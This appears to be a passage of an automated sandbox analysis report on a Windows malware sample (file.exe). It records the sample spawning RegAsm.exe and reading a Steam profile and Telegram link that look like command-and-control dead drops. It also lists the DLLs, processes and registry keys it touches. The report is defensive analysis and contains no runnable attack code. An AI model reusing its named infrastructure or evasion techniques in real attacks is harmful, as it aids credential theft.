Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869H
Source: file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: file.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 393216

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02330C40	0_2_02330C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D933	3_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D1C3	3_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C472	3_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D561	3_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041950A	3_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DD1B	3_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CD2E	3_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B712	3_2_0041B712

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2188

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.1773322212.000000000076E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/9@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 LdrInitializeThunk,CreateToolhelp32Snapshot,Process32First,Process32Next,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,VariantClear,

3_2_00411807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5676
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2188
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\rje\tg\jv2je3\obj\Release\ojc.pdb source: file.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0042582E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

3_2_0042582E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F142 push ecx; ret	3_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00422D3B push esi; ret	3_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DDB5 push ecx; ret	3_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726

Source: file.exe

Static PE information: section name: .text entropy: 7.995811814167676

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
